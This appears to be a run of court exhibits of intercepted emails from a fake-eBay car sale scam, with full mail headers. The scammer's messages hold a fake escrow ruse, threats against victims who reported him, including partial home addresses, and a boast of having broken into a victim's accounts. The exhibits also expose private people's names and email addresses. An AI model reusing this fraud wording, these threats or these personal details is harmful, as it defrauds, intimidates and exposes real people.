style="BORDER-LEFT: #000000 2px solid; PADDING-LEFT: 5px; MARGIN-LEFT: 5px">
  <TABLE border=0 cellSpacing=0 cellPadding=0>
    <TBODY>
    <TR>
      <TD vAlign=top>█████████████████  
      ████████   ████████<BR><BR>--- On <B>Tue,
      6/29/10, fxstd888@me.com <I>&lt;fxstd888@me.com&gt;</I></B> wrote:<BR>
      <BLOCKQUOTE
      style="BORDER-LEFT: rgb(16,16,255) 2px solid; PADDING-LEFT: 5px; MARGIN-LEFT: 5px"><BR>From:
      fxstd888@me.com &lt;fxstd888@me.com&gt;<BR>Subject: Re[4]: 2005
      Harley-Davidson Deuce for Sale<BR>To: "Rick Morgan"
      &lt;rmorgan_tst@yahoo.com&gt;<BR>Date: Tuesday, June 29, 2010, 5:04
      PM<BR><BR>
      <DIV id=yiv1504772637>
      <DIV>Are you getting my emails??</DIV>
      <DIV> </DIV>
      <DIV>Item# is 220626828376, you can search for it on eBay <BR>or you
      can use this link:<BR><A
      href="http://cgi.ebay.com/ebaymotors/ws/eBayISAPI.dll?ViewItem&amp;item=220626828376"
      rel=nofollow
      target=_blank>http://cgi.ebay.com/ebaymotors/ws/eBayISAPI.dll?ViewItem&amp;item=220626828376</A></DIV>
      <DIV> </DIV>
      <DIV>Buy it now price: $7,600.00</DIV>
      <DIV> </DIV></DIV></BLOCKQUOTE></TD></TR></TBODY></TABLE></BLOCKQUOTE></BODY></HTML>


--Boundary_(ID_rl+78C3xHXPUr/1PeohmRw)--

From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 11/19 19:44.59 UTC
Date: November 19, 2010 at 2:45 PM
To: collectau@gmail.com

MB

11/19 19:44.59 UTC:-

X-Arg1: -M
X-Arg2: novss800@ymall.com
X-Arg3: 76.13.13.42
X-Arg4: jilldv3@aol.com.readnotify.com
X-Arg: --msgsep--
From novss800@ymail.com Fri Nov 19 19:44:51 2010
Received: from smtp103.prem.mail.ac4.yahoo.com (smtp103.prem.mail.ac4.yahoo.com [76.13.13.42])
        by mx.mxsvr.com (8.13.8/8.13.8/CWT/DCE) with SMTP id oAJJloqY022356
        for <jilldv3@aol.com.readnotify.com>; Fri, 19 Nov 2010 19:44:51 GMT
Received: (qmail 35576 invoked from network); 19 Nov 2010 19:44:49 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ymail.com; s=s1024; t=1290195889;
  bh=EMcjEimemKNVWfO1cKkQCi0O4ZhFAtA0RNj9VJCXd1s=; h=Received:X-Yahoo-OSG:X-YMail-OSG:X-Yahoo-Newman-
  Property:Message-ID:References:X-Mailer:Date:From:To:Subject:Mime-Version:Content-Type;
  b=jV3AbkcRTaLCu6yrwdeUCVb0t9jFW2BTxv8Rk9Ci/nDVAxd+z8mPwsBCwrqjxkqqbOiNZRLy6t8riewy6z18H8U7TQuIRd9SMYAgVDi
  8CADfNgVh0u6zUSDYiJUFhQ0RaKH5WkDMVddasIO38fKOOqG3jz3eKKz/YktI2uUHRdc=
Received: from jeepers (novss800@172.129.165.72 with login)
        by smtp103.prem.mail.ac4.yahoo.com with SMTP; 19 Nov 2010 11:44:48 -0800 PST
X-Yahoo-SMTP: R2Qja2aswBD8v0HF5Ke_aEptICm9aVDjDhfhT7rbWA--
X-YMail-OSG: C3bhetkVM1kExqDaEBaepJ2Rr7gZ5IulyuJGFLsjb6rVpur
  KM2oYTwcY1f_j5JVmmWC9rwH4uAjKkd06IHf6.1kdQLuBxBUK8tYPFd1zYz5
  KlfvJPWZ3Eqth8Q76WzpYWhoGXYtGLKV4YnYUA7pJ2.6jrRLJBmp8.voBsHI
  .vuAmgY6DTkYy7XnCtujtGJ._8xrZxBwwxENSbdWdy705owUavjMaWT2r2Ty
  IKA2QJL5swuFj9IsDigO1ZPTFCcyBcPeijr3ENr4s4TNH9wnNQFzN1kndq4T
  4zv1bw1b.5IktC2NO
X-Yahoo-Newman-Property: ymall-3
Message-ID: <20101119114520390.00C933FE@plus.smtp.mail.yahoo.com>
References: <20101109094534O4953.0293E50B@plus.smtp.mail.yahoo.com>
  <8CD4F12ECE55335-1CC4-6@webmail-m063.sysops.aol.com>
  <20101101703070281.062E005E@plus.smtp.mail.yahoo.com>
  <8CD4F3FCD17B996-1AB4-DF1@webmail-d054.sysops.aol.com>
  <20101115146320712.00E36FF0@plus.smtp.mail.yahoo.com>
  <20101115150060743.00E6B3FF@plus.smtp.mail.yahoo.com>
  <8CD53332522A9DA-1058-68CA@webmail-d026.sysops.aol.com>
  <20101115160230031.004E05F0@plus.smtp.mail.yahoo.com>
  <20101115160238O609.004E42CA@plus.smtp.mail.yahoo.com>
  <8CD5347F1AFB293-1058-8D5B@webmail-d026.sysops.aol.com>
  <20101171733460028.02088183@plus.smtp.mail.yahoo.com>
  <8CD5559738A450F-17C0-359@Webmail-d121.sysops.aol.com>
  <20101181334110606.0011EFAC@plus.smtp.mail.yahoo.com>
  <8CD558D1CFDEEAB-110C-2D668@Webmail-d111.sysops.aol.com>
  <20101119142300078.00C6E106@plus.smtp.mail.yahoo.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Fri, 19 Nov 2010 11:45:02 -0800
From: "novss800@ymall.com" <novss800@ymall.com>
To: jilldv3@aol.com.readnotify.com
Subject: Re[12]: Congratulations on the ebay purchase.
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=====_129019590222553=_"

--=====_129019590222553=_
Content-Type: text/plain; charset="us-ascii"

16816 Cedar Rd.
start packing!

we are organized crime, i am sure FBI has already made that clear.

and, in a few minutes you'll be able to see that God is Almighty!

********** REPLY SEPARATOR **********

On 11/18/2010 at 6:11 PM jilldv3@aol.com wrote:

I tried to talk to ebay but for some reason they can't find the listing

GOVERNMENT
EXHIBIT
1:16CR224

1327

I tried to talk to ebay but for some reason they can't find the listing.

--=====_129019590222553=_
Content-Type: text/html; charset="us-ascii"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3698" name=GENERATOR></HEAD>
<BODY>
<DIV>16816 Cedar Rd.</DIV>
<DIV>start packing!</DIV>
<DIV> </DIV>
<DIV>we are organized crime, i am sure FBI has already made that clear.</DIV>
<DIV> </DIV>
<DIV>and, in a few minutes you'll be able to see that God is Almighty!</DIV>
<DIV><BR><FONT face=Arial size=2>*********** REPLY SEPARATOR
***********<BR><BR>On 11/18/2010 at 6:11 PM jilldv3@aol.com wrote:</FONT></DIV>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid"><FONT
 face=arial color=black size=2><BR>I tried to talk to ebay but for some reason
 they can't find the listing.<BR>
 <DIV style="CLEAR: both"></DIV>
 <DIV style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: arial,helvetica">
 <DIV id=AOLMsgPart_1_0d8154c3-ce33-4ae6-929f-daae1021f7f8>
 <BLOCKQUOTE
 style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid"><FONT
  face=arial color=black size=2>
  <DIV style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: arial,helvetica">
  <DIV id=AOLMsgPart_1_e3ddda17-2e14-4312-b827-b63a1a0f013a>
  <BLOCKQUOTE
  style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid"><FONT
   face=arial color=black size=2>
   <DIV style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: arial,helvetica">
   <DIV id=AOLMsgPart_0_e786633a-4bb9-4c90-9d70-efa0fb17377c>
   <DIV></DIV></DIV></FONT></BLOCKQUOTE></DIV></DIV></FONT></BLOCKQUOTE></DIV><!-- end of
AOLMsgPart_1_0d8154c3-ce33-4ae6-929f-daae1021f7f8 --></DIV></FONT></BLOCKQUOTE></BODY></HTML>


--=====_129019590222553=_--



From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 11/19 20:14.18 UTC
Date: November 19, 2010 at 3:14 PM
To: collectau@gmail.com

11/19 20:14.18 UTC:-

X-Arg1: -M
X-Arg2: impala63ss@ymail.com
X-Arg3: 76.13.13.45
X-Arg4: ~~craigmckeever@comcast.net~~ readnotify.com
X-Arg: --msgsep--
From impala63ss@ymail.com Fri Nov 19 20:14:10 2010
Received: from smtp106.prem.mail.ac4.yahoo.com (smtp106.prem.mail.ac4.yahoo.com [76.13.13.45])
    by mx.mxsvr.com (8.13.8/8.13.8/CWT/DCE) with SMTP id oAJKE9ee029357
    for <~~craigmckeever@comcast.net~~ readnotify.com>; Fri, 19 Nov 2010 20:14:09 GMT
Received: (qmail 29511 invoked from network); 19 Nov 2010 20:14:07 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ymail.com; s=s1024; t=1290197647;
    bh=xP5q+vCXEiyat2u/hXSO22hLflqWDoPk0DF+brgjnuw=; h=Received:X-Yahoo-SMTP:X-YMail-OSG:X-Yahoo-Newman-
    Property:Message-ID:References:X-Mailer:Date:From:To:Subject:Mime-Version:Content-Type;
    b=HDg2XkStdKQskfz9b8rof/Zs2kkRyMu7ZyrzNvWtrmvRytlwr9d7TSpc6kPgf68r1CkwcYeH/KGAiVoA4I/EXiJr6mByZHa1IXMhZ2llhDrj
    atzBwHp7GAgDQyPLR8qK8RMHix+9AAupD+2bIcPwMmDL/nQpXnyWtQ8IBY/8Xdk=
Received: from jeepers (impala63ss@172.129.165.72 with login)
    by smtp106.prem.mail.ac4.yahoo.com with SMTP; 19 Nov 2010 12:14:04 -0800 PST
X-Yahoo-SMTP: n.F5ApmswBBc0jmUv9.gVTrdeAHMJFMI5RW66k8DFLis
X-YMail-OSG: uEPFKusVM1mWTIstYlJ5J1g.fFsp223zmI4RIEd6UGtTg9u
  VM01rBb0FpmGNiUBCCwB5SD8D9HPhU84pkGGt1fzM5ZbtTcJ_jrQROgCfH7f
  3Rui5xG_TXqf1hICIMJVuRgiTPhEG6J1YZyjm8wW5CJewRbF7sFdtSRgse3J
  RwYeOqK7uIngd08B2PpobpQX7zqMEbsoqkcdEdzGWvoFquNljDjAmPTm3Plq
  oGntyOu8qgAOoj.75NuN5xxhbkP.9romucmc0e8UQe3esx8YoqNuZWkw-
X-Yahoo-Newman-Property: ymail-3
Message-ID: <20101119121410281.00E402D9@plus.smtp.mail.yahoo.com>
References: <724333069.1119006.1290195956306.JavaMail.root@sz0134a.emeryville.ca.mail.comcast.net>
  <20101119121354o0312.00E3A150@plus.smtp.mail.yahoo.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Fri, 19 Nov 2010 12:14:19 -0800
From: "impala63ss@ymail.com" <impala63ss@ymail.com>
To: ~~craigmckeever@comcast.net~~ readnotify.com
Subject: Re[4]: weres the car
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=====_129019765919274=_"

--=====_129019765919274=_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

For reporting me!! You should never mess with people that can hurt you.

But nevermind, I see that you're a stubborn mule, and you will shortly be=
 able to see that God Is Almighty.

And God has your address!
~~2002 Wood Clork Rd~~
so you can either start being REAL POLITE or START PACKING!

And, since you are the "I will report you" kind, you can ask FBI, they will=
 be able to confirm that you are dealing with organized crime here.


*********** REPLY SEPARATOR ***********

On 11/19/2010 at 7:45 PM ~~craig mckeever@comcast.net~~ wrote:

[black redaction box]


--=====_129019765919274=_
Content-Type: text/html; charset="us-ascii"

GOVERNMENT
EXHIBIT
1:16CR224

1328

Content-Type: text/html; charset="us-ascii"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<STYLE type=text/css>p { margin: 0; }</STYLE>

<META content="MSHTML 6.00.2900.3698" name=GENERATOR></HEAD>
<BODY>
<DIV>For reporting me!! You should never mess with people that can hurt
you.</DIV>
<DIV> </DIV>
<DIV>But neverimind, I see that you're a stubborn mule, and you will shortly be
able to see that God Is Almighty.</DIV>
<DIV> </DIV>
<DIV>And God has your address!</DIV>
<DIV>█████████████████████</DIV>
<DIV><FONT color=#ff0000><FONT color=#000000>so you can either start being
</FONT><STRONG>REAL POLITE <FONT color=#000000>or</FONT> START
PACKING!</STRONG></FONT></DIV>
<DIV> </DIV>
<DIV>And, since you are the "I will report you" kind, you can ask FBI, they will
be able to confirm that you are dealing with <U><EM><STRONG>organized
crime</STRONG></EM></U> here.</DIV>
<DIV> </DIV>
<DIV><BR><FONT face=Arial size=2>*********** REPLY SEPARATOR
***********<BR><BR>On 11/19/2010 at 7:45 PM craig.mckeever@comcast.net
wrote:</FONT></DIV>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid">
  <DIV style="FONT-SIZE: 12pt; COLOR: #000000; FONT-FAMILY: Arial">
  <P><FONT color=#ff0000>█████████████████████████████ me
█████████████████████████████</FONT></P>
  <P><FONT color=#ff0000>your car,that car is in penn.u said ur dad own it for
  yrs █████████████████████</FONT></P>
  <P>█ ██████b<FONT size=2
Arial></P></DIV></BLOCKQUOTE></FONT></BODY></HTML>


--=====_129019765919274=_--



From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 11/23 01:30.05 UTC
Date: November 22, 2010 at 8:30 PM
To: collectau@gmail.com

11/23 01:30.05 UTC:-

X-Arg1: -M
X-Arg2: trucking200@ymail.com
X-Arg3: 98.139.52.250
X-Arg4: terry@datacruz.com readnotify.com
X-Arg: --msgsep--
From trucking200@ymail.com Tue Nov 23 01:29:58 2010
Received: from nm30-vm0.bullet.mail.ac4.yahoo.com (nm30-vm0.bullet.mail.ac4.yahoo.com [98.139.52.250])
    by esmtp.mail.ssl.com (8.14.4/8.13.8/CWT/DCE) with SMTP id oAN1TutR030982
    for <terry@datacruz.com readnotify.com>; Tue, 23 Nov 2010 01:29:57 GMT
Received: from [98.139.52.196] by nm30.bullet.mail.ac4.yahoo.com with NNFMP; 23 Nov 2010 01:29:55 -0000
Received: from [74.6.228.38] by tm9.bullet.mail.ac4.yahoo.com with NNFMP; 23 Nov 2010 01:29:55 -0000
Received: from [127.0.0.1] by smtp107.mail.ac4.yahoo.com with NNFMP; 23 Nov 2010 01:29:55 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ymail.com; s=s1024; t=1290475795;
bh=pd6x7clsE4UeQ4WFpwYBm9vvta1cITl+WZhEUYyycTl=; h=X-Yahoo-Newman-Id:Received:X-Yahoo-SMTP:X-YMail-OSG:X-
Yahoo-Newman-Property:Message-ID:References:X-Mailer:Date:From:To:Subject:Mime-Version:Content-Type;
b=V6w0ywcXCpyS9fALDtL5JEVMwa3AlanOUZU1ZmbR7yUJDjWKGh4x5TS13Fp2EAaSHlDZq6RmInDQj3KmhdBkkfJEgLBtv7bop9
SbD74TQBlLLewrdACqdpfn2CaW7lmb8ZtLaF7S+mjvZTz/ddYfZMQGQ/Ab/cHhphmT40H3mDw=
X-Yahoo-Newman-Id: 507474.11963.bm@smtp107.mail.ac4.yahoo.com
Received: from jeepers (trucking200@172.129.142.46 with login)
    by smtp107.mail.ac4.yahoo.com with SMTP; 22 Nov 2010 17:29:53 -0800 PST
X-Yahoo-SMTP: ATEtfgCswBBA9dqwB62mhDeROTpdPWQ1rpP7PWCnl1uuKA--
X-YMail-OSG: F50WKz0VM1n3iwiZUw2og6j1cfF8BZ78gFRObfQLHP8Hwdl
y0YNFSABYDErCHUQTKVDs5RB_loFXO5T0VqvsZIVesupGl2mYqZ2K.nlz5ms
2fCNWwcENK4XpFmTFQvvOjKg07RYXj2VqZRTbETeuhXrSwpu4WtzB7sNVqUf
fUYmkwi7HxZPCF68H3sed0mEaVzJdAIvOmR9rmAKtE8cjxet9bD4di1vJJA1
lwyCT8gtHddHbfAJYUCIAAOPyhPJfg.mPRYFDsOr4Bnd7
X-Yahoo-Newman-Property: ymail-3
Message-ID: <20101221729530046.0183E787@smtp.mail.yahoo.com>
References: <201011091246000843.000B84E9@smtp.mail.yahoo.com>
<201011091456560296.00836247@smtp.mail.yahoo.com>
<3413CFDE9281492CA86D76F8EA19E027@XPP21845>
<201011091543470421.00AE473C@smtp.mail.yahoo.com>
<FEDB8104A56541D48FC848D9717576A7@XPP21845>
<201011092021090625.01AC37D7@smtp.mail.yahoo.com>
<201011092021380375.01ACA825@smtp.mail.yahoo.com>
<C2127F85A5D9412AA7B72142A9796F7B@XPP21845>
<201011101514030578.00A33DDB@184.105.209.2>
<F2D4E2DF280C468DB1515F7DE8C238A2@XPP21845>
<201011111044010572.00543792@smtp.mail.yahoo.com>
<E5F588EDF2254E8CB3EFEB231ECB9BE2@XPP21845>
<201011121402540995.0184CAF1@smtp.mail.yahoo.com>
<635D0B7304A042009B7887F58423024E@owner7d78f0831>
<201011201622070504.0097CDA2@smtp.mail.yahoo.com>
<0E11183C13B248C692111868ADBA1CFB@owner7d78f0831>
<201011221728410218.0182CEF3@smtp.mail.yahoo.com>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Mon, 22 Nov 2010 17:29:53 -0800
From: "trucking200@ymail.com" <trucking200@ymail.com>
To: terry@datacruz.com.readnotify.com
Subject: Re[14]: 1940 Ford Deluxe Coupe
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=====_129047579327417=_"
X-Brightmail-Tracker: AAAAAA==

--=====_129047579327417=_
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

1. Why is your family hurting? Are you beating your wife and children?

2. You are being delusional! The point of scamming you is to get your=
money, therefore the right thing is to keep it.

3. Why have you contacted the authorities? Not that I care, but I think-

GOVERNMENT
EXHIBIT
1:16CR224
1329

3. Why have you contacted the authorities? Not that I care, but I think=
you're trying to fuck with me here, and my advice to you is not to fuck=
with people that can hurt you. APOLOGIZE FOR THAT, that's all I ask.

4. Last and most importantly, you should thank me, as I have saved your ass=
in a number of ways.

Such a car is completely useless, therefore a waste of your and your=
family's money, so at least you ended up spending less than half of what=
you would have lost on a real car.

It's also unsafe! What if you and your family are involved in an accident=
in such a vehicle? I think hospitalization would hurt them more than you=
beating them.

I await your apologies and thanks.
Cheers!
*********** REPLY SEPARATOR ***********

On 11/22/2010 at 7:44 PM Terry VanParys wrote:

██████████████████████████████████████████████
██████████████████████████████████████████████
██████████████████████████████████████████████
██████████████████████████████████████████████

----- Original Message -----
From: trucking200@ymail.com
To: ███████████.com
Sent: Saturday, November 20, 2010 7:22 PM
Subject: Re[12]: 1940 Ford Deluxe Coupe

Do what? Why did you cancel your payment? thats what ebay told me.
*********** REPLY SEPARATOR ***********

On 11/20/2010 at 6:55 PM Terry VanParys wrote:

███████████████████████

----- Original Message -----
From: trucking200@ymail.com
To: ███████████.com
Sent: Friday, November 12, 2010 5:02 PM
Subject: Re[10]: 1940 Ford Deluxe Coupe

Just got off chatting with eBay. They did return the money to your account,=
but it may take 24 business hours to post. I have asked them to assign a=
new agent, and they have done so, and you are also getting a $200 discount=
from ebay.

So I guess it kinda sucks having to wait like that but as soon as you get=
the refund, please send it again, so we dont wast any more time.

Thanks!!!
Carlos
*********** REPLY SEPARATOR ***********

On 11/11/2010 at 5:38 PM Terry VanParys wrote:

██████████████████████████████████████████████

----- Original Message -----
From: trucking200@ymail.com
To: ███████████m
Sent: Thursday, November 11, 2010 1:44 PM
Subject: Re[8]: 1940 Ford Deluxe Coupe

I just got off Live Help with ebay, they alerted me that they sent the=
money back to you, by mistake? You should get there and talk to them too.

*********** REPLY SEPARATOR ***********

On 11/11/2010 at 11:17 AM Terry VanParys wrote:



----- Original Message -----
From: trucking200@ymail.com
To: terry@███████.com
Sent: Wednesday, November 10, 2010 6:14 PM
Subject: Re[6]: 1940 Ford Deluxe Coupe

Well I am still waiting for ebay to confirm.

After I am satisfied that they hold the money I will give you all the info.

BTW, what's your shipping address?

*********** REPLY SEPARATOR ***********

On 11/10/2010 at 5:51 PM Terry VanParys wrote:
Hello Carlos,



----- Original Message -----
From: trucking200@ymail.com
To: ███████████████
Sent: Tuesday, November 09, 2010 11:21 PM
Subject: Re[4]: 1940 Ford Deluxe Coupe

No, I haven't made the modifications myself. I've bought it the way it is.

Let me know when  you have sent the money to ebay and please email me your=
 shipping address so I can take care of it asap.

Regards,
Carlos
*********** REPLY SEPARATOR ***********

On 11/9/2010 at 7:58 PM Terry VanParys wrote:

----- Original Message -----
From: trucking200@ymail.com
To: ███████████████
Sent: Tuesday, November 09, 2010 6:43 PM
Subject: Re[2]: 1940 Ford Deluxe Coupe

Yes, it's all steel, no bondo. Absolutely nothing wrong with the car=
 everything in perfect running order. Engine runs great too.

I am selling because I need the money real fast and I'm not home to take=
 care of it any better so it's gotta go over the internet, that's why the=

low price. Thing is I was counting on this sale a couple of weeks ago when=
I had the deal with the buyer who backed out, because of loan problems.

So if you have the money, I would appreciate you buying it asap.

Thanks!

*********** REPLY SEPARATOR ***********

On 11/9/2010 at 6:33 PM Terry VanParys wrote:

----- Original Message -----
From: trucking200@ymail.com
T
Sent: Tuesday, November 09, 2010 5:56 PM
Subject: Re: 1940 Ford Deluxe Coupe

Just to get a perfect idea of how this vehicle looks like and its awesome=
condition, I have uploaded some new pics on Kodak. Feel free to check them=
out:

http://www.kodak-slideshows.com/wTEbxmoZATU9BDMbwCIfB70g

--=====_129047579327417=_
Content-Type: text/html; charset="ISO-8859-1"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3698" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY style="FONT-FAMILY: Arial" text=#000000 bgColor=#ffffff>
<DIV>1. Why is your family hurting? Are you beating your wife and
children?</DIV>
<DIV> </DIV>
<DIV>2. You are being delusional! The point of scamming you is to get your
money, therefore the right thing is to keep it. </DIV>
<DIV> </DIV>
<DIV>3. Why have you contacted the authorities? Not that I care, but I think

you're trying to fuck with me here, and my advice to you is not to fuck with
people that can hurt you. APOLOGIZE FOR THAT, that's all I ask.</DIV>
<DIV> </DIV>
<DIV>4. Last and most importantly, you should thank me, as I have saved your ass
in a number of ways.</DIV>
<DIV> </DIV>
<DIV>Such a car is completely useless, therefore a waste of your and your
family's money, so at least you ended up spending less than half of what you
would have lost on a real car.</DIV>
<DIV> </DIV>
<DIV>It's also unsafe! What if you and your family are involved in an accident
in such a vehicle? I think hospitalization would hurt them more than you beating
them.</DIV>
<DIV> </DIV>
<DIV>I await your apologies and thanks.</DIV>
<DIV>Cheers!<BR><FONT face=Arial size=2>*********** REPLY SEPARATOR
***********<BR><BR>On 11/22/2010 at 7:44 PM Terry VanParys wrote:</FONT></DIV>
<BLOCKQUOTE
style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid">
  <DIV><FONT size=2>█████████████████████████
       

  ██████████.   </FONT></DIV>
  <DIV><FONT size=2></FONT> </DIV>
  <DIV><FONT size=2>███████████████████   ██████ly
  ██████████████I</FONT></DIV>

From: **Mailto Blackhole** devnull@srve.com
Subject: Monitor 12/26 06:01.02 UTC
Date: December 26, 2010 at 1:01 AM
To: collectau@gmail.com



12/26 06:01.02 UTC:-

X-Arg1: -M
X-Arg2: Ikhbradre@yahoo.com
X-Arg3: 98.139.91.210
X-Arg4: ⬛⬛⬛⬛⬛⬛⬛⬛@⬛⬛⬛⬛⬛⬛.readnotify.com
X-Arg: --msgsep--
From Ikhbradre@yahoo.com Sun Dec 26 06:00:55 2010
Received: from [nm16-vm0.bullet.mail.sp2.yahoo.com (nm16-vm0.bullet.mail.sp2.yahoo.com [98.139.91.210])
    by mail.readnotify.org (8.13.8/8.13.8/CWT/DCE) with SMTP id oBQ60sQJ017259
    for ⬛⬛⬛⬛⬛⬛⬛⬛@⬛⬛⬛readnotify.com>; Sun, 26 Dec 2010 06:00:54 GMT
Received: from [98.139.91.67] by nm16.bullet.mail.sp2.yahoo.com with NNFMP; 26 Dec 2010 06:00:54 -0000
Received: from [98.136.185.43] by tm7.bullet.mail.sp2.yahoo.com with NNFMP; 26 Dec 2010 06:00:54 -0000
Received: from [127.0.0.1] by smtp104.mail.gq1.yahoo.com with NNFMP; 26 Dec 2010 06:00:54 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1293343254;
bh=NqyDaVd0nOMs1r5wDZNS58TZbLdMo2Ylle6KwzvfOxc=; h=X-Yahoo-Newman-Id:Received:X-Yahoo-SMTP:X-YMail-OSG:X-
Yahoo-Newman-Property:Message-ID:X-Mailer:Date:From:To:Cc:Subject:Mime-Version:Content-Type;
b=53xFxwTbFUynyGl1L/S/vt2PbTd+/wghjjkv7cFyt/Vsc/J+xswSVBuHkRXDVsfykV6u1pOjjKv2utQcWMBzpZaSPsBOGkkMKkpYHr5Q
wPZQwy8LAlFcML0rXR/75Nx8rp1DHyC5GrBEABKmJELyu+BudzH3dNHK6cec56T5EPl=
X-Yahoo-Newman-Id: 756642.337.bm@smtp104.mail.gq1.yahoo.com
Received: from t (Ikhbradre@173.180.79.147 with login)
    by smtp104.mail.gq1.yahoo.com with SMTP; 25 Dec 2010 22:00:51 -0800 PST
X-Yahoo-SMTP: nuU5f3qswBDH.gWZNwCCJVEwpiPTFA--
X-YMail-OSG: 8xqujWAVM1kucmbEYv5oOLtIlUYknSfjpBoqmUb0rmXMbmG
WMeZ7ksVrIlTaeX2wIACUDv3E_qHjjT4MXhOCOAQ04YnxVoNUdeHu0oFjpAl
8dqRP.hUDxGXI8dxku_pgSXPqs1dheTI4P25pEqZmUkr6xpY3_houUutWwwE
I5lHNKU7MEs0YcnMOJPyV02o.OcX3q2YC9h5ql0nA.VTVRo_HddYL4_Mi0dy
8M59KTQcfX2aXy0Uxq5SACz58JCzbc7R5Zf8wf5X_lzHLlLc9hKUNUUjHxmQ
pcZ2xAN0oF4Dr1CStpT9uqLi.WWtSbLBF.z.96HVGG3uO8Cg-
X-Yahoo-Newman-Property: ymail-3
Message-ID: <20101226103054056.015B2FE2@184.105.210.2>
X-Mailer: Courier 3.50.00.09.1098 (http://www.rosecitysoftware.com) (P)
Date: Sun, 26 Dec 2010 10:30:54 +0430
From: ⬛⬛⬛⬛⬛⬛⬛⬛⬛" Ikhbradre@yahoo.com>
To: ⬛⬛⬛⬛⬛⬛⬛⬛⬛⬛⬛⬛.readnotify.com
Cc: elemi ⬛⬛⬛⬛⬛⬛⬛⬛⬛m.readnotify.com
Subject: Love affair between ⬛⬛⬛⬛ and ⬛⬛⬛⬛⬛/ Emails
    suggesting this / PLEASE READ
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=====_129334325418467=_"
X-Brightmail-Tracker: AAAAAA===

--=====_129334325418467=_
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello 

Sorry for getting into your lives, I will get straight to the point as it's=
kind of late now.

I wanted to sell my car and⬛⬛ replied to an ad of mine, than he started=
using harsh language, offended me and although I am a man of=
understanding, I ended up not tollerating his shit. Being bright with=
computers, I thought of teaching him a lesson and wiping his files, email=
accounts and other accounts he may have with other websites.

This is what I wanted to do at first, but hey I'm not irrational. I thought=
it up for a momment I could have done a lot of harm to other innocent=
people and I started investigating more about him and what kind of man he=
is. I went from the idea that he's a fucking moron and the way he is=
treating you as a wife confirmed this to me.

I don't wanna do any harm to you, just to the moron⬛⬛ who treated me=
with very big disrespect, and I want you to find out something about his=
love affairs and about what he does when he's out there in the freedom 4=

GOVERNMENT
EXHIBIT
1:16CR224
1330


love affairs and about what he does which he's out there in the freedom 4—
hours by himself or when you think he's at work. Check out those emails=
between him and ▅▅▅▅▅▅▅ ( ▅▅▅▅▅▅▅▅▅▅▅ ) at the end of this.=
It starts out easily then it gets more passionate.

If you dont believe me then log on to his yahoo account

username: ▅▅▅▅▅▅▅▅▅
password ▅▅▅▅▅

and search through the messages in the Sent folder, you will find those=
there. Check the messages from the inbox as well, there were some there=
but not as passionate as those from the Sent folder. He took care to=
delete the ones incriminating him maybe

Oh and you can even ask ▅▅▅▅

You may be wondering why am I doing this, I could have erased all the data=
in your ebay account as well "myseventeen", but seeing what a jerk this=
husband of yours is, and this having nothing to do with you, moreover his=
a jerk to you too, I changed my mind.


Yours,
Mr X


Here are emails between Mike and Lana  starting 2007 up to 2010


Re: thank u
Saturday, March 24, 2007 9:53 AM
From: "▅▅▅▅▅▅▅▅▅mikey7@yahoo.com>
To: L▅▅▅▅▅▅▅▅▅▅

█████████████████████████████████████
█████████████████████████████████████

Lanarossann@aol.com wrote:

███████████████████████
███████████████████████
███████████████████████

**************************************************

Re: hey
Tuesday, July 31, 2007 3:42 PM
From: "michael smith" <elmikey7@yahoo.com>
To: L▅▅▅▅▅▅▅▅▅

██████████████████████████████████████████
██████████████████████████████████████████

▅▅▅▅▅▅@▅▅▅▅▅ wrote:

███████████████████████████
███████████████████████████

**************************************************

Re: FW: 1959 Chevy Bel Air vs 2009 Chevy Malibu
Thursday, October 8, 2009 7:25 PM
From: "mi▅▅▅▅▅▅▅▅▅▅y@yahoo.com>
To:L▅▅▅▅▅▅▅▅▅

----Original Message----
Date: Thursday, October 08, 2009 7:08:11 pm
To: elmikey7@yahoo.com
From: L███████████████████
Subject: Re: FW: 1959 Chevy Bel Air vs 2009 Chevy Malibu

